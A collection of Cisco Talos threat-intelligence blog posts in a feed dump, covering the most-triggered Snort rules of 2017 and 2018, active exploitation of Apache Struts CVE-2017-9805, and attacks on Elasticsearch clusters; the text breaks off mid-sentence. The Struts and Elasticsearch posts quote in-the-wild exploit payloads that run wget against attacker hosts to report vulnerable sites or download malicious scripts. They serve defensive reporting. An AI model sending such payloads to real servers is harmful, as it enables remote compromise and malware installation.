disguised as plain text, and traffic associated with Zeus, Swabfex, Soaphrish, Glupteba malware.\n\n \n\n\nThe \u201cAttempted-user\u201d class type covers attempts to exploit user level vulnerabilities. The majority of the most frequently triggered signatures in this set were detected attempts to exploit Internet Explorer vulnerabilities.\n\n \n \n\n\nOutbound signatures most frequently reported class types of detections triggering on internal network traffic belong to the \u201cMisc-activity\u201d and \u201cTrojan-activity\u201d classes.\n\n[](<https://1.bp.blogspot.com/-3ReC-VJ4c4U/Wm9efWbE1RI/AAAAAAAAADg/uLB_1xM1ts8q8BGfEQSnukBhvGwpxTDkgCLcBGAs/s1600/outbound.jpg>)\n\n \n\n\nThe most frequently triggered signatures within the \u201cTrojan-activity\u201d signature class are the Jenxcus and .bit dns activity signatures discussed above. Other prevalent trojan activity is related to ZeroAccess, Cidox, Zeus and Ramnit trojans.\n\n \n \n\n\nInternal traffic signature types most frequently reported detection class types belong to the \u201cMisc-activity\u201d and \u201cTrojan-activity\u201d classes.\n\n[](<https://3.bp.blogspot.com/-WPqQaY8jpX4/Wm9csL0dQbI/AAAAAAAAADI/EGmC0y1-koUKV7SjLPqSqSENCB1SCIfxACLcBGAs/s1600/internal.jpg>)\n\n \n\n\nMisc activity signatures include detections for various traffic patterns which do not easily fit into any other specific class types. This includes detection of DNS requests to less common top level domains like .top, .win, .trade, detection of traffic to domains known to be used by adware and other potentially unwanted applications (PUAs) as well as detection of suspicious HTTP user-agent strings.\n\n \n\n\n## Peaks and Troughs\n\n \n\n\nAttacks are happening continuously. Every hour of the day, every day of the year signatures are being triggered by the constant background noise of the attackers\u2019 activity. However, some signatures are clearly triggered by malicious activity being conducted during a particular period.\n\n \n\n\nOn March 6th, Apache disclosed an Apache Struts command injection vulnerability [CVE-2017-5638](<https://www.cvedetails.com/cve/cve-2017-5638>). Talos released signature [1:41818](<https://www.snort.org/rule_docs/1-41818>) to detect and block exploitation of the vulnerability. Within a couple of days, attackers were conducting [widespread campaigns](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) to identify and compromise vulnerable systems.\n\n \n\n\nAs shown in the graph below, attempts to exploit CVE-2017-5638 comprised more than 20% of all triggering signatures at the peak of the malicious activity. This campaign soon abated, but never ceased completely, until a second large peak in activity occurred over 6 days at the end of October.\n\n[](<https://4.bp.blogspot.com/-0qQJHwb3FeY/Wm9ijI4-c0I/AAAAAAAAAEI/F46PdClpxsE7hgYoXRYVqr9HyqK37-ivQCLcBGAs/s1600/struts.jpg>)\n\n \n\n\nThis graph neatly illustrates the importance of patching as well as installing and enabling signatures for new vulnerabilities as soon as possible. There may be a very short period of time between the disclosure of a vulnerability and the widespread attempted exploitation of the vulnerability by threat actors.\n\n \n\n\nSimilarly, once an initial attempt to compromise is over, the same attack may recommence some time later, so defences need to be maintained in order to ensure that systems are kept protected.\n\n \n\n\nAnother interesting pattern showing several periods of increased activity can be seen in the timeline for signature [1:40843](<https://www.snort.org/rule_docs/1-40843>). This signature detects and blocks the so called SSL Death Alert Denial of Service vulnerability in OpenSSL ([CVE-2016-8610](<https://tools.cisco.com/security/center/viewAlert.x?alertId=49575>)). An attacker can exploit vulnerable systems over the network to consume 100% CPU, preventing the system from responding to legitimate requests.\n\nFor extended periods during 2017, this vulnerability was not heavily targeted by attackers. However there are very clear periods when attackers were conducting campaigns to exploit this vulnerability.\n\n[](<https://3.bp.blogspot.com/-eUHPebdBogQ/Wm9dFKuIuhI/AAAAAAAAADU/J27BULbKtxA3iDQoVSkvsUyyrIqtOONZgCLcBGAs/s1600/dos.jpg>)\n\n \n\n\nOur primary advice is to install patches as soon as possible. However, patched versions of some software packages are not being released for this vulnerability. In this case, upgrading to a non-vulnerable version would be the preferred option, but this may not be possible in every case. Ensuring that vulnerable systems are protected by IPS with the relevant signatures installed and enabled, helps keep malicious traffic from impacting unpatched vulnerable systems.\n\n \n\n\n## Discussion\n\n \n\n\nSnort signatures detect potentially malicious network activity. Understanding why particular signatures are triggered and how they can protect systems is a key part of network security. Snort signatures can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization\u2019s security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated.\n\n \n\n\nAs the threat environment changes, it is necessary to ensure that the correct signatures are in place protecting systems. Usually, this means ensuring that the most recent signature set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short.\n\n \n\n\nOur most commonly triggered signature in 2017: 1:40522:3 \u201cUnix.Trojan.Mirai variant post compromise fingerprinting\u201d highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected.\n\n \n\n\nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the signatures to be open source. Knowing what network content caused a signature to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection.\n\n \n\n\nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving [community of researchers](<https://www.snort.org/community>) contributing to Snort and helping to keep networks secure against attack. We\u2019re also proud to contribute to the training and education of network engineers through the [Cisco Networking Academy](<https://www.netacad.com>), as well through the release of additional [open-source tools](<https://www.talosintelligence.com/software>) and the detailing of attacks on our blog.\n\n \n\n\nThere is no doubt that 2018 will bring its own security challenges and it will be interesting to follow how reported detections are evolving over the year together with new threats. We will make sure to keep you up to date with events relevant to your organizations and networks.\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=ZAu5fhdHIK0:DbYh7gve-dY:yIl2AUoC8zA>)\n\n", "cvss3": {}, "published": "2018-01-29T11:37:00", "type": "talosblog", "title": "2017 in Snort Signatures.", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-8610", "CVE-2017-5638"], "modified": "2018-01-29T19:37:15", "id": "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/ZAu5fhdHIK0/2017-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>,&nbsp;Talos&nbsp;responded&nbsp;to&nbsp;a&nbsp;zero-day&nbsp;vulnerability that&nbsp;was under active exploitation in&nbsp;the&nbsp;wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\">&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite&lt;/string&gt;</blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\">&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`&lt;/string&gt;</blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\">&lt;string&gt;wget&lt;/string&gt;&lt;string&gt;hxxp://st2buzgajl.alifuzz[.]com/052&lt;/string&gt;</blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-09-07T15:42:00", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-12T15:23:07", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n_ \n_The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. \n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. \n \nOrganizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 &amp; 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" &amp; \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). \n \n\n\n \n\n\n[](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. \n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).", "cvss3": {}, "published": "2019-02-06T08:19:00", "type": "talosblog", "title": "2018 in Snort Rules", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"], "modified": "2019-02-12T14:15:53", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop 